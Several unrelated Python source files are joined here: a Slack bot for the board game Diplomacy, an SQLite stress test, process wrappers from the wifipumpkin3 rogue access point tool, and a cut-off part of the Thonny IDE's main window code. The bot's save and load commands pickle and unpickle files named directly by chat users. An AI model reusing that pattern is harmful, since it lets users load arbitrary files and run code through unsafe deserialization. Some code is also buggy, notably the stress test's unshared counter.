self.diplomacy = DIPLOMACY_CHANNEL
self.sc = SlackClient(API_TOKEN)
self.bot_id = None
self.current = None
self.starting = False
self.running = False
self.season = "SPRING"
self.date = 1901
self.resolving = False
self.players={}
self.countries = {1: "Russia",
2: "England",
3: "Germany",
4: "France",
5: "Austria",
6: "Italy",
7: "Turkey"}
self.orders = { 1:[],2:[],3:[],4:[],5:[],6:[],7:[]}
self.ready = {}
self.run()
#============================= Messaging
def send(self,message):
self.sc.api_call(
"chat.postMessage",
channel=self.current,
text=message,
as_user="true")
def im(self, player, message):
self.sc.api_call(
"conversations.open",
users=player,
return_im="true")
self.sc.api_call(
"chat.postMessage",
channel=player,
text=message,
as_user="true")
def showMap(self, player, mapname):
self.sc.api_call(
"files.upload",
channels=player,
as_user="true",
filename=mapname,
file=open(mapname, 'rb'))
#============================= User Interface
def start(self):
try:
info = self.sc.api_call("channels.info",channel=self.current)
if(info['channel']['id'] != self.diplomacy):
self.send("This isn't the diplomacy channel")
return
except KeyError:
self.send("This isn't the diplomacy channel")
return
if(self.starting == False):
self.send("@channel A new game of Diplomacy is starting...\n"
"Message \"@bender add me\" if you want to join the game\n"
"Message \"@bender Start\" when all members have registered and you are ready to play\n"
"Message \"@bender help\" if you need a list of all available commands")
self.starting = True
self.map = Map()
self.addPlayer()
else:
self.starting = False
self.running = True
self.send("Starting Game...")
if(len(self.players) > 7):
self.send("Too many players for this game. Quitting...")
self.starting = False
self.running = False
return
playerstr = "Players are "+"".join([str(self.players[i][0])+", " for i in self.players])
self.send(playerstr[:-2])
self.randomizeCountries()
self.springFall()
for i in self.players:
ctry = self.players[i][1]
self.im(i,"Your country is "+str(self.countries[ctry]))
unitLocs = "Your units are: "+ "".join([str(j[0])+", " for j in self.map.getUnitsByCountry(ctry)])
#send map
#self.showMap(i, "diplomacy_map.png")
self.im(i,unitLocs[:-2])
self.im(i,"Send orders here, so they are private.\n Valid orders are in form [unit type] [location of unit] [action] [location of action or second unit] [second unit action] [location of second unit action]")
def addPlayer(self):
info = self.sc.api_call("users.info",user=self.sender)
if(self.starting == False):
self.send("A game is not in the regristration phase at the moment.")
return
if(self.sender not in self.players):
self.players[self.sender] = [str(info['user']['name']),""] #string username, countryID, ready for adj
self.send("Added player: "+str(info['user']['name']))
else:
self.send("You cannot be in the same game twice")
def randomizeCountries(self):
assign = random.sample(range(1,8),len(self.players))
it = 0
for i in self.players:
self.players[i][1] = assign[it]
self.ready[assign[it]] = False
it += 1
#print(self.players)
#============================== Needs Work
def show(self, opt = None):#needs to implement map generation with the map library
if(opt): self.command = opt
if(self.command[1][0] == "M" or self.command[1][0] == "U"):
self.map.saveMap("current_units.png")
self.showMap(self.current, "current_units.png")
elif(self.command[1][0] == "L"):
self.showMap(self.current, "labeledMap.png")
else:
self.map.getMap()
self.map.saveMap("current_units.png")
self.showMap(self.current, "current_units.png")
def playerReady(self):
ctry = self.players[self.sender][1]
if(self.command[0][0] == "N"):
self.ready[ctry] = False
else:
self.ready[ctry] = True
if(all(ready == True for ready in self.ready.values())):
self.current = self.diplomacy
self.adjudicate()
def help(self):
self.im(self.current,"Available Commands: Start, Add Me, Ready, Not Ready, Adjudicate, Show Map, Show Labels, Save, Load, Verify\n"
"Start: Starts new game. The first start command begins player registration, the second begins the game.\n"
"Add me: Registers the sender as a player in the starting game.\n"
"Ready/NotReady: If all players are ready, the game adjudicates before the timer and without manual coordination.\n"
"Adjudicate: Progresses a season and resolves movement/retreat/creation orders.\n"
"Show Map: Shows map with units."
"Show Labels: Shows map with territory labels and no units.\n"
"Save <filename>: Saves game state as <filename>.\n"
"Load <filename>: Loads game state from <filename>.\n"
"Verify: Repeats back orders a player input for manual verification.")
def win(self): #ties not implemented yet
for i in self.players:
ctry = self.players[i][1]
supplyDepots = len(self.map.getOwnedSupplyDepots(ctry))
if(supplyDepots >= 18):
self.running = False
self.send("Game Over! The winner is "+self.countries[ctry])
return
def save(self):
#if(self.resolving == True):
# self.im(self.current, "Please resolve the current season before saving.")
# return
try:
filename = self.command[1]
gameState = (self.map, self.players, self.orders, self.resolving, self.season, self.date)
pickle.dump(gameState, open(filename, "wb"))
self.send("Game state saved as: "+str(filename))
except IndexError:
self.im(self.current,"You need to specify a filename to save as.")
#except:
# self.im(self.current,"Game state failed to save.")
def load(self):
try:
filename = self.command[1]
gameState = pickle.load(open(filename,"rb"))
self.map, self.players, self.orders, self.resolving, self.season, self.date = gameState
self.starting = False
self.running = True
self.send("Loading Game "+str(filename)+"...")
if(self.season == "WINTER"):
self.winter()
else:
self.springFall()
except IndexError:
self.im(self.current,"You need to specify a filename to load or specify a filename a game was saved as.")
#except:
# self.im(self.current,"Game state failed to load.")
#============================== Game movement interface
def standardizeOrder(self, cmd):
typ = loc1 = act1 = loc2 = act2 = loc3 = None
try:
typ = cmd[0][0]
loc1 = cmd[1]
act1 = cmd[2][0]
loc2 = cmd[3]
act2 = cmd[4][0]
loc3 = cmd[5]
except IndexError: pass
if(act1 == "M" or act1 == "A"):
act1 = "-"
if(act2 == "M" or act2 == "A"):
act2 = "-"
return list(filter(None,[typ,loc1,act1,loc2,act2,loc3]))
def ordered(self):
ctry = self.players[self.sender][1]
idx = 0
for i in self.orders[ctry]:
if(i[1] == self.command[1]):
del self.orders[ctry][idx]
idx += 1
self.command = self.standardizeOrder(self.command)
self.orders[ctry].append(self.command[:])
#print(self.orders[ctry])
self.send("Added standardized order: "+" ".join(self.command))
def verify(self):
ctry = self.players[self.sender][1]
ordrs = "Your entered orders are:\n "
for i in self.orders[ctry]:
ordrs += " ".join(i)+"\n"
#print(ordrs)
self.im(self.sender, ordrs[:])
def springFall(self):
if(self.resolving == False):
self.show(opt = "map")
self.send("The "+self.season.lower().capitalize()+" "+str(self.date)+" season is starting")
self.send("Send in your movement orders at this time.")
else:
self.show(opt = "map")
self.send("The "+self.season.lower().capitalize()+" "+str(self.date)+" season is ending")
self.send("Send in your retreat orders at this time.")
self.send("Sending an invalid order will cause the unit to be destroyed.")
for i,loc in self.retreats:
self.im(i.controllerID,"Your unit at "+loc+" needs to retreat")
def winter(self):
unitsToBuild = build(self.players, self.map)
self.win() #Check if win conditions are met
self.show(opt = "map")
self.send("The "+self.season.lower().capitalize()+" "+str(self.date)+" season is starting")
self.send("Send in your unit creation/destruction orders at this time.")
for i in self.players:
ctry = self.players[i][1]
if(unitsToBuild[ctry] > 0):
self.im(i,"You need to build "+str(unitsToBuild[ctry])+" units. You can only build them on your home supply depots.")
self.im(i,"Type [unit type] [spawn location] to order unit creation. The spawn location must be unoccupied.")
elif(unitsToBuild[ctry] == 0):
self.im(i,"You have no units to build or destroy.")
else:
self.im(i,"You need to destroy "+str(-1*unitsToBuild[ctry])+" units.")
self.im(i,"Type [unit type] [location] to order unit destruction.")
self.unitsToBuild = unitsToBuild
#=============================== Game Logic
#self.command[Type, location1, action1, location2, action2, location3]
def adjudicate(self):
if(self.current != self.diplomacy):
self.send("Adjudication must happen in the diplomacy channel.")
return
self.ready = dict.fromkeys(self.ready,False)
if(self.season == "SPRING"):
if(self.resolving == False):
self.retreats = move(self.map,self.orders)
self.resolving = True
if(self.retreats == []):
self.resolving = False
self.season = "FALL"
self.springFall() #tells players to send in retreat orders if resolving, else announces next season
else:
retreat(self.orders,self.retreats) #handles retreat orders
self.season = "FALL"
self.resolving = False
self.springFall()
elif(self.season == "FALL"):
if(self.resolving == False):
self.retreats = move(self.map,self.orders)
self.resolving = True
if(self.retreats == []):
self.resolving = False
self.season = "WINTER"
# self.springFall()
else:
retreat(self.orders,self.retreats) #handles retreat orders
self.season = "WINTER"
self.resolving = False
# self.springFall()
if(self.season == "WINTER"):
if(self.resolving == False):
self.winter()
self.resolving = True
else:
resolveWinterOrders(self.players,self.map,self.orders,self.unitsToBuild)
self.season = "SPRING"
self.date += 1
self.resolving = False
self.orders = {1:[],2:[],3:[],4:[],5:[],6:[],7:[]}
#=============================== Event Loop and Bones
def handle_command(self,cmd, channel, sender):
default_response = "I do not understand that command"
self.viableCommands = {
"START":self.start,
"ADD ME":self.addPlayer,
"READY":self.playerReady,
"NOT READY":self.playerReady,
"HELP":self.help,
"F ":self.ordered,
"A ":self.ordered,
"ADJUDICATE":self.adjudicate,
"VERIFY":self.verify,
"SAVE":self.save,
"LOAD":self.load,
"SHOW":self.show}#list of commands
iscommand = False
#variables needed for functions that can't be passed with the dictionary
self.current = channel
self.sender = sender
self.command = cmd.upper().split()
#executes proper code for given command
for i in self.viableCommands:
if cmd.upper().startswith(i):
iscommand = True
if((self.starting == True and (i in["START","ADD ME"])) or self.running == True or (i in ["START","HELP","LOAD"]) ):
#print("command detected: ",i)
self.viableCommands[i]()
else:
self.send("A game is not currently starting")
if(not iscommand):
self.send(default_response)
def parse_bot_commands(self,slack_events):
for event in slack_events:
if event["type"] == "message" and not "subtype" in event:
user_id, message = self.parse_direct_mention(event["text"])
if user_id == self.bot_id:
return message, event["channel"], event["user"]
elif event["channel"][0] == "D" and self.bot_id != event["user"]:
return event["text"], event["channel"], event["user"]
return None, None, None
def parse_direct_mention(self,message_text):
matches = re.search(MENTION_REGEX, message_text)
# the first group contains the username, the second group contains the remaining message
return (matches.group(1), matches.group(2).strip()) if matches else (None, None)
def run(self):
if self.sc.rtm_connect(with_team_state=False):
print("Starter Bot connected and running!")
self.bot_id = self.sc.api_call("auth.test")["user_id"]
while True:
command, channel, user = self.parse_bot_commands(self.sc.rtm_read())
if command:
# t = threading.Thread(target=self.handle_command, args=(command, channel, user))
# t.start()
self.handle_command(command, channel, user)
time.sleep(RTM_READ_DELAY)
else:
print("Connection failed. Exception traceback printed above.")
if __name__ == "__main__":
bot = diplomacyBot()
|
test.py | #!/usr/bin/python
# stress test the sqlite writing with several threads
from multiprocessing import Process, Lock, current_process
def proc_func(lock, counter):
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy_declarative import Address, Base, Person
engine = create_engine('sqlite:///sqlalchemy_example.db', connect_args={'timeout': 30})
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
while True:
lock.acquire()
counter += 1
lock.release()
print '[%s] adding person %d' % (current_process().name, counter)
# Insert a Person in the person table
new_person = Person(name='new person %d' % counter)
session.add(new_person)
session.commit()
# Insert an Address in the address table
new_address = Address(post_code='00000 %d' % counter, person=new_person)
session.add(new_address)
session.commit()
lock = Lock()
counter = 0
for num in range(2):
Process(target=proc_func, args=(lock, counter)).start() |
threads.py | import logging
import socket
from os import kill
import signal
from multiprocessing import Process, Queue
from subprocess import Popen, STDOUT, PIPE
from PyQt5.QtCore import QThread, pyqtSignal, pyqtSlot, QProcess, QObject
from wifipumpkin3.core.packets.dhcpserver import DHCPProtocol
from wifipumpkin3.core.utility.printer import display_messages, colors
from wifipumpkin3.core.common.platforms import Linux as Refactor
import wifipumpkin3.core.utility.constants as C
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class DHCPServerProcess(QThread):
_ProcssOutput = pyqtSignal(object)
def __init__(self, cmd, directory_exec=None):
QThread.__init__(self)
self.directory_exec = directory_exec
self.cmd = cmd
def standardProcOutput(self, q):
with Popen(
self.cmd, bufsize=1, stdout=PIPE, stderr=STDOUT, universal_newlines=True
) as p:
for line in p.stdout:
q.put(line)
def run(self):
self.queue = Queue()
self.started = True
self.procDHCP = Process(target=self.standardProcOutput, args=(self.queue,))
self.procDHCP.start()
print("[New Thread {} ({})]".format(self.procDHCP.pid, self.objectName()))
while self.started:
self._ProcssOutput.emit(self.queue.get())
def getpid(self):
""" return the pid of current process in background"""
return self.procDHCP.pid
def getID(self):
""" return the name of process in background"""
return self.objectName()
def stop(self):
print("Thread::[{}] successfully stopped.".format(self.objectName()))
self.procDHCP.terminate()
self.started = False
self.queue.close()
class ProcessThread(QThread):
_ProcssOutput = pyqtSignal(object)
def __init__(self, cmd, directory_exec=None):
QThread.__init__(self)
self.directory_exec = directory_exec
self.cmd = cmd
@pyqtSlot()
def getNameThread(self):
return "[New Thread {} ({})]".format(self.procThread.pid(), self.objectName())
def readProcessOutput(self):
self.data = str(self.procThread.readAllStandardOutput(), encoding="ascii")
self._ProcssOutput.emit(self.data)
def getpid(self):
""" return the pid of current process in background"""
return self.procThread.pid()
def getID(self):
""" return the name of process in background"""
return self.objectName()
def start(self):
self.procThread = QProcess(self)
self.procThread.setProcessChannelMode(QProcess.MergedChannels)
if self.directory_exec:
self.procThread.setWorkingDirectory(self.directory_exec)
self.procThread.start(
list(self.cmd.keys())[0], self.cmd[list(self.cmd.keys())[0]]
)
self.procThread.readyReadStandardOutput.connect(self.readProcessOutput)
print("[New Thread {} ({})]".format(self.procThread.pid(), self.objectName()))
def stop(self):
print("Thread::[{}] successfully stopped.".format(self.objectName()))
if hasattr(self, "procThread"):
self.procThread.terminate()
self.procThread.waitForFinished()
self.procThread.kill()
class DHCPServerProcess(QThread):
_ProcssOutput = pyqtSignal(object)
def __init__(self, cmd, directory_exec=None):
QThread.__init__(self)
self.directory_exec = directory_exec
self.cmd = cmd
def standardProcOutput(self, q):
with Popen(
self.cmd, bufsize=1, stdout=PIPE, stderr=STDOUT, universal_newlines=True
) as p:
for line in p.stdout:
q.put(line)
def run(self):
self.queue = Queue()
self.started = True
self.procDHCP = Process(target=self.standardProcOutput, args=(self.queue,))
self.procDHCP.start()
print("[New Thread {} ({})]".format(self.procDHCP.pid, self.objectName()))
while self.started:
self._ProcssOutput.emit(self.queue.get())
def stop(self):
print("Thread::[{}] successfully stopped.".format(self.objectName()))
self.procDHCP.terminate()
self.started = False
self.queue.close()
class ProcessHostapd(QObject):
statusAP_connected = pyqtSignal(object)
statusAPError = pyqtSignal(object)
def __init__(self, cmd, session):
QObject.__init__(self)
self.cmd = cmd
self.session = session
self.errorAPDriver = (
"AP-DISABLED",
"Failed to initialize interface",
"nl80211 driver initialization failed.",
"errors found in configuration file",
)
self.msg_inactivity = []
self.queue = Queue()
self.started = False
def getpid(self):
""" return the pid of current process in background"""
return self.procHostapd.pid()
def getID(self):
""" return the name of process in background"""
return self.objectName()
def removeInactivityClient(self, client_mac):
all_clients = Refactor.readFileDataToJson(C.CLIENTS_CONNECTED)
if client_mac in all_clients.keys():
del all_clients[client_mac]
Refactor.writeFileDataToJson(C.CLIENTS_CONNECTED, all_clients)
def read_OutputCommand(self):
self.data = str(self.procHostapd.readAllStandardOutput(), encoding="ascii")
if (
"AP-STA-DISCONNECTED" in self.data.rstrip()
or "inactivity (timer DEAUTH/REMOVE)" in self.data.rstrip()
):
self.removeInactivityClient(self.data.split()[2])
self.statusAP_connected.emit(self.data.split()[2])
# check error hostapd log
for error in self.errorAPDriver:
if self.data.find(error) != -1:
return self.statusAPError.emit(self.data)
def start(self):
self.procHostapd = QProcess(self)
self.procHostapd.setProcessChannelMode(QProcess.MergedChannels)
self.procHostapd.start(
list(self.cmd.keys())[0], self.cmd[list(self.cmd.keys())[0]]
)
self.procHostapd.readyReadStandardOutput.connect(self.read_OutputCommand)
self.started = True
print(
display_messages(
"starting hostpad pid: [{}]".format(self.procHostapd.pid()), sucess=True
)
)
def stop(self):
print("Thread::[{}] successfully stopped.".format(self.objectName()))
if hasattr(self, "procHostapd"):
self.started = False
self.procHostapd.terminate()
|
workbench.py | # -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
running,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.plugins.microbit import MicrobitFlashingDialog
from thonny.plugins.micropython.uf2dialog import Uf2FlashingDialog
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
logger = logging.getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
# self._init_backend_switcher()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self.bind("BackendRestart", self._on_backend_restart, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.event_generate("WorkbenchReady")
self.ready = True
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_statusbar(self):
self._statusbar = ttk.Frame(self)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
